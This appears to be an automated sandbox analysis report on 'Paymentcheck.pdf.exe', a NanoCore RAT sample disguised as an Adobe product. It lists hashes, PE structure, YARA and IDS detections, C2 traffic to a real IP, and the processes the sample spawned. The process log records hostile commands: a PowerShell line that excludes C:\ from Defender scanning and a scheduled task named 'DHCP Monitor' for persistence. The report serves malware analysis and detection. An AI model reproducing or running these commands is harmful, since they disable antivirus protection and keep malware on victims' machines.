                              Size (bytes):1049
                              Entropy (8bit):4.2989523990568035
                              Encrypted:false
                              SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                              MD5:970EE6AEAB63008333D1D883327DA660
                              SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                              SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                              SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                              Malicious:false
                              Reputation:unknown
                              Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.954045447359108
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:Paymentcheck.pdf.exe
                              File size:486400
                              MD5:b7e3c3c9735d6ba37616d791171fe2db
                              SHA1:8763c22ed1151ec2c5b584415154ec7e3c50d964
                              SHA256:91b97fb3f4695fd57c723b537c5b811195f9f99b0ac6033835f75444c36712b9
                              SHA512:e19725da6b7673860a1aa22b473fa59c38fc81a989969a11327a708d9289b2695976d3dfe1d6467d429fa3358d5cf0b022c14ca9862cff68dae2eebadee4c95d
                              SSDEEP:12288:N/vJVn4mZTs+EWEI69JHelW2Mm3XrtJ7aneX:tMmZTs+qVGWtm35N
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f/...............0..:...0......>X... ...`....@.. ....................................@................................

                              File Icon

                              Icon Hash:4e9292f2c88cd3cc

                              Static PE Info

                              General

                              Entrypoint:0x47583e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0xBB2F66FF [Sun Jul 7 18:05:51 2069 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x757f00x4b.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x2ca0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x738440x73a00False0.979803631757data7.98540121704IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rsrc0x760000x2ca00x2e00False0.146654211957data3.25857363406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x7a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_ICON0x761300x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512
                              RT_GROUP_ICON0x786d80x14data
                              RT_VERSION0x786ec0x3c8data
                              RT_MANIFEST0x78ab40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Version Infos

                              DescriptionData
                              Translation0x0000 0x04b0
                              LegalCopyrightCopyright 2019 Adobe Inc. All rights reserved.
                              Assembly Version2.0.0.592
                              InternalNametopA1.exe
                              FileVersion2.0.0.592
                              CompanyNameAdobe Inc
                              LegalTrademarks
                              CommentsAdobe Download Manager
                              ProductNameAdobe Download Manager
                              ProductVersion2.0.0.592
                              FileDescriptionAdobe Download Manager
                              OriginalFilenametopA1.exe

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              08/03/21-08:27:54.228892TCP2025019ET TROJAN Possible NanoCore C2 60B497712018192.168.2.4217.138.212.57

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 3, 2021 08:27:53.016474009 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:54.099281073 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:54.101644993 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:54.228892088 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:55.107541084 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:55.107676983 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:55.147273064 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:55.147423983 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:55.782269001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:55.784817934 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:56.438827991 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:56.494590044 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:56.504901886 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.155390024 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.183080912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184142113 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184262991 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.184508085 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184701920 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184794903 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.185137033 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.185631037 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.185904026 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.186058044 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.188045025 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.188126087 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.188519955 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.188623905 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.189238071 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.809499025 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.809520006 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.809655905 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.810545921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.810564041 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.810681105 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.811285973 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.811305046 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.811395884 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.812160015 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813565016 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813584089 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813677073 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.814728975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.814750910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815210104 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815228939 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815304041 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.815321922 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.816252947 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818298101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818317890 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818346977 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.818797112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818813086 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818877935 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.818905115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.820180893 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.820815086 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.821829081 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.422130108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422149897 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422337055 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.422650099 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422662020 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422801018 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.437520027 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.437534094 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438402891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.438420057 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438431978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438498020 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.438925982 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438940048 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438987970 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.440114021 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.441627979 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.441709995 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.442107916 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.442585945 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.442933083 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.442966938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443496943 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443511963 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443984985 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.444008112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.444041967 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.444176912 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.446219921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446244001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446711063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446732044 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447354078 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447375059 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447443962 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.447463989 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.447467089 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.448440075 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449229002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449248075 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449352980 CEST497712018192.168.2.4217.138.212.57

                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: Paymentcheck.pdf.exe PID: 3736 Parent PID: 6000

                              General

                              Start time:08:26:26
                              Start date:03/08/2021
                              Path:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\Paymentcheck.pdf.exe'
                              Imagebase:0x660000
                              File size:486400 bytes
                              MD5 hash:B7E3C3C9735D6BA37616D791171FE2DB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Reputation:low

                              Analysis Process: wscript.exe PID: 6464 Parent PID: 3736

                              General

                              Start time:08:27:41
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
                              Imagebase:0xc40000
                              File size:147456 bytes
                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: RegAsm.exe PID: 6732 Parent PID: 3736

                              General

                              Start time:08:27:41
                              Start date:03/08/2021
                              Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Imagebase:0x4a0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Antivirus matches:
                              • Detection: 0%, Virustotal, Browse
                              • Detection: 0%, Metadefender, Browse
                              • Detection: 0%, ReversingLabs
                              Reputation:high

                              Analysis Process: powershell.exe PID: 6860 Parent PID: 6464

                              General

                              Start time:08:27:42
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
                              Imagebase:0x880000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              Analysis Process: conhost.exe PID: 6872 Parent PID: 6860

                              General

                              Start time:08:27:43
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: schtasks.exe PID: 1748 Parent PID: 6732

                              General

                              Start time:08:27:46
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
                              Imagebase:0xdd0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: conhost.exe PID: 5968 Parent PID: 1748

                              General

                              Start time:08:27:47
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: RegAsm.exe PID: 1476 Parent PID: 968

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
